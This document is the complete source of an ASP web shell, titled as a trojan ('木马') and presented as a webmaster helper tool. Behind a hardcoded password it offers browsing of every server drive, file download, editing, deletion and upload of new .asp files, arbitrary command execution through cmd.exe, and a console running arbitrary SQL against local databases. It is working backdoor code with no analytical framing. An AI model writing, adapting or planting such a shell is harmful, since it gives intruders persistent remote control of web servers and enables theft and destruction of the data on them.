桂林老兵站ASP木马

<% '########版权所有 - 桂林老兵站www.gxgl.com Server.ScriptTimeout=50000 Response.Buffer = True On Error Resume Next ApplicationName = "Asp站长助手6.0"                         '#####程序名称/标题 UserPass        = "gxgl.com"                               '#####初始登录密码   ShowFileIco     = True                                     '#####是否显示图标,False为用文字图标 IcoPath         = "http://www.GXGL.com/images/FileType/"   '#####图标目录,不必修改 URL             = Request.ServerVariables("URL") ServerIP        = Request.ServerVariables("LOCAL_ADDR") BackUrl         = Request.ServerVariables("HTTP_REFERER") Action          = Request("Action") RootPath        = Server.MapPath(".") WWWRoot         = Server.MapPath("/") FolderPath      = Request("FolderPath") FName           = Request("FName")

If Session("GXGL")<>UserPass Then   If Request.Form("LoginPass")<>"" Then     If Request.Form("LoginPass")=UserPass Then       Session("GXGL")=UserPass       Response.Redirect BackUrl     Else   response.write"验证未通过！"     End If   Else     Response.Write"<center><br><br>欢迎使用ASP站长助手<br><br>"     Response.Write"<form action='"&URL&"' method='post' name='lform'>"     Response.Write"请输入密码：<input name='LoginPass' type='password' size='15'>"     Response.Write"&nbsp;<input type='submit' value='登录'></form></center>"   End If   Response.End End If

sub ShowErr()   If Err Then     Response.Write"<br><a href='javascript:history.back()'><br>&nbsp;" & Err.Description & "</a><br>"     Err.Clear:Response.Flush   End If   end sub

Function RePath(S)   RePath=Replace(S,"/","//") End Function

Function RRePath(S)   RRePath=Replace(S,"//","/") End Function

If FolderPath<>"" then   Session("FolderPath")=RRePath(FolderPath) End If

If Session("FolderPath")="" Then   FolderPath=RootPath   Session("FolderPath")=FolderPath End if

Function IsIco(ia,ib,ta)  If ShowFileIco=true Then       IsIco = " <img src='"&IcoPath&ia&"'> "    If ib<>"" Then    IsIco = "<img src='"&IcoPath&ib&"'> "    End If  Else    IsIco = "&nbsp;<font face='wingdings' color='#006600' size='3'>"&ta&"</font>  "  End If End Function

Function MainForm()   SI="<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"   SI=SI&"<input type=""hidden"" name=""Action"">"   SI=SI&"<input type=""hidden"" name=""FName"">"   SI=SI&"</form>"   SI=SI&"<table width='100%' height='100%'  border='0' cellpadding='0' cellspacing='0' bgcolor='menu'>"   SI=SI&"<tr><td height='30' colspan='2'>"   SI=SI&"<table width='100%' height='25'  border='0' cellpadding='0' cellspacing='0'>"   SI=SI&"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"   SI=SI&"<tr><td width='60' align='center'>地址栏：</td><td>"   SI=SI&"<input type='text' name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"   SI=SI&"</td><td width='60' align='center'><input name='Submit' type='submit' value='转到'>"   SI=SI&"</td></tr></form></table></td></tr><tr><td width='160'>"   SI=SI&"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='2' scrolling='yes'></iframe></td>"   SI=SI&"<td>"   SI=SI&"<iframe name='FileFrame' src='?Action=ShowFile' width='100%' height='100%' frameborder='1' scrolling='yes'></iframe>"   SI=SI&"</td></tr></table>"   Response.Write SI End Function

Function MainMenu()   SI="<table width='100%' border='0' cellspacing='0' cellpadding='0'>"   SI=SI&"<tr><td height='5'></td></tr>"   SI=SI&"<tr><td>&nbsp;"   SI=SI&IsIco("minus.gif","computer.gif","o")   SI=SI&"<a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>"&ServerIP&"</a>"   SI=SI&"</td></tr>"   Set FSO=server.createobject("scripting.filesystemobject")   For Each D in FSO.Drives     SI=SI&"<tr><td>&nbsp;&nbsp;"     SI=SI&IsIco("plus.gif","driver.gif","v")     SI=SI&"<a href='javascript:ShowFolder("""&D.DriveLetter&"://"")'>本地磁盘 ("&D.DriveLetter&":)</a>"     SI=SI&"</td></tr>"   Next   Set FSO=Nothing   Response.Write SI : SI=""

  SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI& IsIco("minus.gif","folder.gif","0")   SI=SI&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>返回根目录</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI& IsIco("minus.gif","newfolder.gif","1")   SI=SI&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"/NewFolder")&""",""NewFolder"")'>新建目录</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI&IsIco("minus.gif","newfile.gif","2")   SI=SI&"<a href='?Action=EditFile' target='FileFrame'>新建文本</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI&IsIco("minus.gif","main.gif","8")   SI=SI&"<a href='?Action=UpFile' target='FileFrame'>上传文件</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;"   SI=SI&IsIco("plus.gif","main.gif","o")   SI=SI&"数据库操作"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI&IsIco("minus.gif","newfile.gif","4")   SI=SI&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"/New.mdb")&""",""CreateMdb"")'>建立MDB文件</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI&IsIco("minus.gif","mdb.gif","4")   SI=SI&"<a href='?Action=DbManager' target='FileFrame'>数据库操作</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;"   SI=SI&IsIco("minus.gif","zip.gif","4")   SI=SI&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"/data.mdb")&""",""CompactMdb"")'>压缩MDB文件</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;"   SI=SI&IsIco("minus.gif","cmd.gif","o")   SI=SI&"<a href='?Action=CmdShell' target='FileFrame'>命令行</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;"   SI=SI&IsIco("minus.gif","main.gif","f")   SI=SI&"<a href='?Action=Logout' target='_top'>退出登录</a>"   SI=SI&"</td></tr>"   SI=SI&"<tr><td>&nbsp;"   SI=SI&IsIco("minus.gif","htm.gif","f")   SI=SI&"<a href='http://www.gxgl.com' target='_blank'>桂林老兵站</a>"   SI=SI&"</td></tr>"   SI=SI&"</table>"   Response.Write SI End Function

Function FileIco(FName)   If ShowFileIco=true Then     TypeList = ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip"     FileType = lcase(Mid(FName, InstrRev(FName,".")+1))     If Instr(TypeList,"."&FileType)>0 then       Ico = FileType&".gif"     Else       Ico = "default.gif"     End If       FileIco = "<img src='"&IcoPath&Ico&"' border='0'> "   Else     FileIco="<font face='wingdings' color='#006600' size='3'>2</font> "   End If End Function   Function ShowFile(Path)   SET FSO=server.createobject("scripting.filesystemobject")   Set FOLD=FSO.GetFolder(Path)   i=0     SI="<table width='100%'  border='0' cellspacing='0' cellpadding='0' bgcolor='#EFEFEF'><tr>"   For Each F in FOLD.subfolders     SI=SI&"<td>"  SI=SI&IsIco("","folder.gif","0")     SI=SI&" <a href='javascript:ShowFolder("""&RePath(Path&"/"&F.Name)&""")'>"&F.Name&"</a>"     SI=SI&" | <a href='javascript:FullForm("""&Replace(Path&"/"&F.Name,"/","//")&""",""DelFolder"")'  onclick='return yesok()' class='am' title='删除'>del</a>"  SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"/"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='复制'>copy</a>"  SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"/"&F.Name)&""",""MoveFolder"")'  onclick='return yesok()' class='am' title='移动'>move</a>"  i=i+1     If i mod 3 = 0 then SI=SI&"</tr><tr>"   Next     SI=SI&"</tr><tr><td height=5></td></tr></table>"  Response.Write SI : SI=""     For Each L in Fold.files     SI="<table width='100%'  border='0' cellspacing='1' cellpadding='0'>"     SI=SI&"<tr onMouseOver=""this.className='tr'"" onMouseOut=""this.className=''"">"     SI=SI&"<td height='20'>"&FileIco(L.Name)  SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"/"&L.Name)&""",""DownFile"");' title='下载'>"&L.Name&"</a></td>"     SI=SI&"<td width='140'>"&L.Type&"</td>"     SI=SI&"<td width='50'>"&clng(L.size/1024)&"K</td>"     SI=SI&"<td width='120'>"&L.DateLastModified&"</td>"     SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"/"&L.Name)&""",""EditFile"")' class='am' title='编辑'>edit</a></td>"  SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"/"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='删除'>del</a></td>"  SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"/"&L.Name)&""",""CopyFile"")' class='am' title='复制'>copy</a></td>"  SI=SI&"<td width='40' align=""center""><a href='javascript:FullForm("""&RePath(Path&"/"&L.Name)&""",""MoveFile"")' class='am' title='移动'>move</a></td>"     SI=SI&"</tr></table>"  Response.Write SI : SI=""   Next   Set FOLD=Nothing   Set FSO=Nothing End Function

Function DownFile(Path)   Response.Clear   Set OSM = Server.CreateObject("ADODB.Stream")   OSM.Open   OSM.Type = 1   OSM.LoadFromFile Path     Response.AddHeader "Content-Disposition", "attachment; filename=" & Path     Response.Charset = "UTF-8"     Response.ContentType = "application/octet-stream"     Response.BinaryWrite OSM.Read     Response.Flush   OSM.Close   Set OSM = Nothing End Function

Function DelFile(Path)   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If FSO.FileExists(Path) Then    FSO.DeleteFile Path       SI="<center><br><br><br>文件 "&Path&" 删除成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function HTMLEncode(S)   if not isnull(S) then     S = replace(S, ">", "&gt;")     S = replace(S, "<", "&lt;")     S = replace(S, CHR(39), "&#39;")     S = replace(S, CHR(34), "&quot;")     HTMLEncode = S   end if End Function

Function EditFile(Path)   If Request("Action2")="Post" Then     Set FSO=Server.CreateObject("Scripting.FilesyStemobject")       Set T=FSO.CreateTextFile(Path)         T.WriteLine Request.form("content")         T.close       Set T=nothing     Set FSO=nothing     SI="<center><br><br><br>文件保存成功！</center>"     SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"     Response.Write SI  Response.End   End If     If Path<>"" Then     Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     Set T=FSO.opentextfile(Path, 1, False)     Txt=HTMLEncode(T.readall)     T.close     Set T=Nothing     Set FSO=Nothing   Else     Path=Session("FolderPath")&"/newfile.asp":Txt="新建文件"   End If     SI="<table width='100%' height='100%'><tr><td valign='top' align='center'>"    SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>"   SI=SI&"<input name='Action' value='EditFile' Type='hidden'>"   SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>"   SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>"   SI=SI&"<hr><input name='goback' type='button' value='返回' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='重置'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='保存'></form>"   SI=SI&"</td></tr></table></body></html>"   Response.Write SI End Function

Function CopyFile(Path)   Path = Split(Path,"||||")   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If FSO.FileExists(Path(0)) and Path(1)<>"" Then    FSO.CopyFile Path(0),Path(1)       SI="<center><br><br><br>文件"&Path&"复制成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function MoveFile(Path)   Path = Split(Path,"||||")   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If FSO.FileExists(Path(0)) and Path(1)<>"" Then    FSO.MoveFile Path(0),Path(1)       SI="<center><br><br><br>文件"&Path&"移动成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function DelFolder(Path)   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If FSO.FolderExists(Path) Then    FSO.DeleteFolder Path       SI="<center><br><br><br>目录"&Path&"删除成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function CopyFolder(Path)   Path = Split(Path,"||||")   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If FSO.FolderExists(Path(0)) and Path(1)<>"" Then    FSO.CopyFolder Path(0),Path(1)       SI="<center><br><br><br>目录"&Path&"复制成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function MoveFolder(Path)   Path = Split(Path,"||||")   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If FSO.FolderExists(Path(0)) and Path(1)<>"" Then    FSO.MoveFolder Path(0),Path(1)       SI="<center><br><br><br>目录"&Path&"移动成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function NewFolder(Path)   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")     If Not FSO.FolderExists(Path) and Path<>"" Then    FSO.CreateFolder Path       SI="<center><br><br><br>目录"&Path&"新建成功！</center>"       SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI  End If   Set FSO=Nothing End Function

Function UpFile()   If Request("Action2")="Post" Then     Set U=new UPC : Set F=U.UA("LocalFile")  UName=U.form("ToPath")     If UName="" Or F.FileSize=0 then       SI="<br>请输入上传的完全路径后选择一个文件上传!"     Else         F.SaveAs UName         If Err.number=0 Then           SI="<center><br><br><br>文件"&UName&"上传成功！</center>"   End if  End If  Set F=nothing:Set U=nothing  SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"  Response.Write SI  ShowErr()  Response.End   End If     SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"     SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"     SI=SI&"<tr><td>"     SI=SI&"上传路径：<input name='ToPath' value='"&RRePath(Session("FolderPath")&"/newup.asp")&"' size='40'>&nbsp;"     SI=SI&"<input name='LocalFile' type='file'  size='25'>"     SI=SI&"<input type='submit' name='Submit' value='上传'>"     SI=SI&"</td></tr></form></table>"   Response.Write SI End Function

Function CmdShell()   If Request("cmd")<>"" Then     DefCmd = Request("cmd")   Else     DefCmd = "Dir "&Session("FolderPath")   End If   SI="<form method='post'><input type=text name='cmd' Style='width:95%;background-color:#000000;color:#FFFFFF' value='"&DefCmd&"'>"   SI=SI&"<input type='submit' value='执行'>"   SI=SI&"<textarea readonly  Style='width:100%;height:520;background-color:#000000;color:#FFFFFF'>"   SI=SI&server.createobject("wscript.shell").exec("cmd.exe /c "&DefCmd).stdout.readall   SI=SI&Chr(13)&"Rar命令行压缩示例：c:/progra~1/winrar/rar.exe a d:/web/test/web1.rar d:/web/test/web1</textarea></form>"   Response.Write SI End Function

Function CreateMdb(Path)    SI="<br><br>"    Set C = Server.CreateObject("ADOX.Catalog")    C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)    Set C = Nothing    If Err.number=0 Then      SI = SI & Path & "建立成功!"    End If    SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"    Response.Write SI End function

Function CompactMdb(Path)   Set FSO=Server.CreateObject("Scripting.FilesyStemobject")   If FSO.FileExists(Path) Then     Set C=Server.CreateObject("JRO.JetEngine")       C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"  Set C=Nothing     FSO.DeleteFile Path  FSO.MoveFile Path&"_bak",Path   Else     SI="<center><br><br><br>数据库"&Path&"没有发现！</center>"  Err.number=1   End If   Set FSO=Nothing   If Err.number=0 Then     SI="<center><br><br><br>数据库"&Path&"压缩成功！</center>"   End If   SI=SI&"<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"   Response.Write SI End Function

Function DbManager()   SqlStr=Trim(Request.Form("SqlStr"))   DbStr=Request.Form("DbStr")

  SI=SI&"<table width='100%'  border='0' cellspacing='0' cellpadding='0'>"   SI=SI&"<form name='DbForm' method='post' action=''>"   SI=SI&"<tr><td width='100' height='27'> &nbsp;数据库连接串:</td>"   SI=SI&"<td><input name='DbStr' type='text' style='width:100%' value="""&DbStr&"""></td>"   SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>连接串示例</option><option value=0>Access连接</option>"   SI=SI&"<option value=1>MsSql连接</option><option value=2>MySql连接</option><option value=3>DSN连接</option>"   SI=SI&"<option value=-1>--SQL语法--</option><option value=4>显示数据</option><option value=5>添加数据</option>"   SI=SI&"<option value=6>删除数据</option><option value=7>修改数据</option><option value=8>建数据表</option>"   SI=SI&"<option value=9>删数据表</option><option value=10>添加字段</option><option value=11>删除字段</option>"   SI=SI&"<option value=12>完全显示</option></select></td></tr>"   SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"   SI=SI&"<tr><td height='30'>&nbsp;SQL操作命令:</td>"   SI=SI&"<td><input name='SqlStr' type='text' style='width:100%' value="""&SqlStr&"""></td>"   SI=SI&"<td align='center'><input type='submit' name='Submit' value='执行' onclick='return DbCheck()'></td>"   SI=SI&"</tr></form></table>"   Response.Write SI:SI=""

  If Len(DbStr)>40 Then     Set Conn=Server.CreateObject("Adodb.Connection")   Conn.Open DbStr   Set Rs=Conn.OpenSchema(20)   SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>表<br>名</td>"   Rs.MoveFirst   Do While Not Rs.Eof     If Rs("TABLE_TYPE")="TABLE" then    TName=Rs("TABLE_NAME")       SI=SI&"<td align=center><a href='javascript:FullSqlStr(""DROP TABLE ["&TName&"]"",1)'>[ del ]</a><br>"       SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"     End If     Rs.MoveNext   Loop   Set Rs=Nothing   SI=SI&"</tr></table>"   Response.Write SI:SI=""          If Len(SqlStr)>10 Then

  If LCase(Left(SqlStr,6))="select" then     SI=SI&"执行语句："&SqlStr     Set Rs=Server.CreateObject("Adodb.Recordset")     Rs.open SqlStr,Conn,1,1     FN=Rs.Fields.Count     RC=Rs.RecordCount     Rs.PageSize=20     Count=Rs.PageSize     PN=Rs.PageCount     Page=request("Page")     If Page<>"" Then Page=Clng(Page)     If Page="" Or Page=0 Then Page=1     If Page>PN Then Page=PN     If Page>1 Then Rs.absolutepage=Page     SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"       For n=0 to FN-1       Set Fld=Rs.Fields.Item(n)       SI=SI&"<td align='center'>"&Fld.Name&"</td>"       Set Fld=nothing     Next     SI=SI&"</tr>"

    Do While Not(Rs.Eof or Rs.Bof) And Count>0    Count=Count-1    Bgcolor="#EFEFEF"    SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"     For i=0 To FN-1         If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if         If RC=1 Then            ColInfo=HTMLEncode(Rs(i))         Else            ColInfo=HTMLEncode(Left(Rs(i),50))         End If      SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"    Next    SI=SI&"</tr>"       Rs.MoveNext     Loop    Response.Write SI:SI=""    SqlStr=HtmlEnCode(SqlStr)

    SI=SI&"<tr><td colspan="&FN+1&" align=center>记录数："&RC&"&nbsp;页码："&Page&"/"&PN     If PN>1 Then       SI=SI&"&nbsp;&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""",1)'>首页</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>上一页</a>&nbsp;"       If Page>8 Then:Sp=Page-8:Else:Sp=1:End if       For i=Sp To Sp+8         If i>PN Then Exit For         If i=Page Then         SI=SI&i&"&nbsp;"         Else         SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a>&nbsp;"         End If       Next    SI=SI&"&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>下一页</a>&nbsp;<a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>尾页</a>"     End If     SI=SI&"<hr color='#EFEFEF'></td></tr></table>"     Rs.Close:Set Rs=Nothing    Response.Write SI:SI=""   Else        Conn.Execute(SqlStr)     SI=SI&"SQL语句："&SqlStr   End If

  Response.Write SI:SI="" End If

  Conn.Close   Set Conn=Nothing   End If End Function %>

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title><%=ApplicationName&" - "&ServerIP%></title> <style type="text/css"> <!--   body,td {font-size: 12px;}   input,select{font-size: 12px;background-color:#FFFFFF;}   .tr {background-color:#EFEFEF;}   body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;     <%If Action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}   a {color: black;text-decoration: none;}   .am {color: #003366;font-size: 11px;} --> </style>

<script language="javascript"> <!--   function yesok(){     if (confirm("确认要执行此操作吗？"))   return true;  else   return false;     }

  function ShowFolder(Folder){     top.addrform.FolderPath.value = Folder;     top.addrform.submit();     }

  function FullForm(FName,FAction){     top.hideform.FName.value = FName;  if(FAction=="CopyFile"){      DName = prompt("请输入复制到目标文件全名称",FName);      top.hideform.FName.value += "||||"+DName;  }else if(FAction=="MoveFile"){      DName = prompt("请输入移动到目标文件全名称",FName);      top.hideform.FName.value += "||||"+DName;     }else if(FAction=="CopyFolder"){      DName = prompt("请输入移动到目标文件夹全名称",FName);      top.hideform.FName.value += "||||"+DName;     }else if(FAction=="MoveFolder"){      DName = prompt("请输入移动到目标文件夹全名称",FName);      top.hideform.FName.value += "||||"+DName;  }else if(FAction=="NewFolder"){      DName = prompt("请输入要新建的文件夹全名称",FName);      top.hideform.FName.value = DName;  }else if(FAction=="CreateMdb"){      DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名！",FName);         top.hideform.FName.value = DName;  }else if(FAction=="CompactMdb"){      DName = prompt("请输入要压缩的Mdb文件全名称,注意文件是否存在！",FName);         top.hideform.FName.value = DName;  }else{      DName = "Other";  }    if(DName!=null){       top.hideform.Action.value = FAction;       top.hideform.submit();  }else{       top.hideform.FName.value = "";  }   }     function DbCheck(){     if(DbForm.DbStr.value == ""){    alert("请先连接数据库");    FullDbStr(0);    return false;  }  return true;   }     function FullDbStr(i){    if(i<0){      return false;    }     Str = new Array(12);   Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>//db.mdb";  Str[1] = "Driver={Sql Server};Server=<%=ServerIP%>,1433;Database=DbName;Uid=sa;Pwd=****";  Str[2] = "Driver={MySql};Server=<%=ServerIP%>;Port=3306;Database=DbName;Uid=root;Pwd=****";  Str[3] = "Dsn=DsnName";  Str[4] = "SELECT * FROM [TableName] WHERE ID<100";  Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(/'gxgl_com/',/'mypass/')";  Str[6] = "DELETE FROM [TableName] WHERE ID=100";  Str[7] = "UPDATE [TableName] SET USER=/'gxgl_com/' WHERE ID=100";  Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";  Str[9] = "DROP TABLE [TableName]";  Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";  Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";  Str[12]= "当只显示一条数据时即可显示字段的全部字节，可用条件控制查询实现./n超过一条数据只显示字段的前五十个字节。";  if(i<=3){    DbForm.DbStr.value = Str[i];    DbForm.SqlStr.value = "";  }else if(i=12){    alert(Str[i]);  }else{    DbForm.SqlStr.value = Str[i];  }  return true;   }       function FullSqlStr(str,pg){     if(DbForm.DbStr.value.length<5){    alert("请检查数据库连接串是否正确!")    return false;  }     if(str.length<10){    alert("请检查SQL语句是否正确!")    return false;  }     DbForm.SqlStr.value = str ;  DbForm.Page.value = pg;  DbForm.submit();     return true;   } --> </script> </head> <body> <% Dim T1 Class UPC   Dim D1,D2

  Public Function Form(F)     F=lcase(F)     If D1.exists(F) then:Form=D1(F):else:Form="":end if   End Function

  Public Function UA(F)     F=lcase(F)     If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if   End Function

  Private Sub Class_Initialize   Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName     set D1=Server.CreateObject("Scripting.Dictionary")  if Request.TotalBytes<1 then Exit Sub     set T1 = Server.CreateObject("Adodb.Stream")  T1.Type = 1 : T1.Mode =3 : T1.Open     T1.Write  Request.BinaryRead(Request.TotalBytes)     T1.Position=0 : TDa =T1.Read : DStart = 1     DEnd = LenB(TDa)     set D2=Server.CreateObject("Scripting.Dictionary")  vbCrlf = chrB(13) & chrB(10)     set T2 = Server.CreateObject("Adodb.Stream")     TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)     TLen = LenB (TSt)     DStart=DStart+TLen+1     while (DStart + 10) < DEnd       DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3       T2.Type = 1 : T2.Mode =3 : T2.Open       T1.Position = DStart       T1.CopyTo T2,DIEnd-DStart       T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"       TIn = T2.ReadText : T2.Close       DStart = InStrB(DIEnd,TDa,TSt)       FStart = InStr(22,TIn,"name=""",1)+6       FEnd = InStr(FStart,TIn,"""",1)       UpName = lcase(Mid (TIn,FStart,FEnd-FStart))       if InStr (45,TIn,"filename=""",1) > 0 then         set TFL=new FIF         FStart = InStr(FEnd,TIn,"filename=""",1)+10         FEnd = InStr(FStart,TIn,"""",1)         FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14         FEnd = InStr(FStart,TIn,vbCr)         TFL.FileStart =DIEnd         TFL.FileSize = DStart -DIEnd -3         if not D2.Exists(UpName) then           D2.add UpName,TFL         end if       else         T2.Type =1 : T2.Mode =3 : T2.Open         T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3         T2.Position = 0 : T2.Type = 2         T2.Charset ="gb2312"         SFV = T2.ReadText         T2.Close         if D1.Exists(UpName) then           D1(UpName)=D1(UpName)&", "&SFV         else           D1.Add UpName,SFV         end if       end if       DStart=DStart+TLen+1     wend     TDa=""     set T2 =nothing   End Sub     Private Sub Class_Terminate     if Request.TotalBytes>0 then       D1.RemoveAll:D2.RemoveAll       set D1=nothing:set D2=nothing       T1.Close:set T1 =nothing     end if   End Sub End Class

Class FIF dim FileSize,FileStart   Private Sub Class_Initialize   FileSize = 0   FileStart= 0   End Sub     Public function SaveAs(F)   dim T3   SaveAs=true   if trim(F)="" or FileStart=0 then exit function   set T3=CreateObject("Adodb.Stream")      T3.Mode=3 : T3.Type=1 : T3.Open      T1.position=FileStart      T1.copyto T3,FileSize      T3.SaveToFile F,2      T3.Close      set T3=nothing      SaveAs=false    end function End Class

Select Case Action   Case "MainMenu":MainMenu():ShowErr()     Case "ShowFile":ShowFile(Session("FolderPath"))   Case "DownFile":DownFile FName:ShowErr()   Case "DelFile":DelFile FName:ShowErr()   Case "EditFile":EditFile FName:ShowErr()   Case "CopyFile":CopyFile FName:ShowErr()   Case "MoveFile":MoveFile FName:ShowErr()   Case "DelFolder":DelFolder FName:ShowErr()   Case "CopyFolder":CopyFolder FName:ShowErr()   Case "MoveFolder":MoveFolder FName:ShowErr()   Case "NewFolder":NewFolder FName:ShowErr()   Case "UpFile":UpFile()   Case "Logout":Session.Contents.Remove("GXGL"):Response.Redirect URL   Case "CmdShell":CmdShell():ShowErr()   Case "CreateMdb":CreateMdb FName:ShowErr()   Case "CompactMdb":CompactMdb FName:ShowErr()   Case "DbManager":DbManager():ShowErr()   Case Else MainForm() End Select %> </body> </html>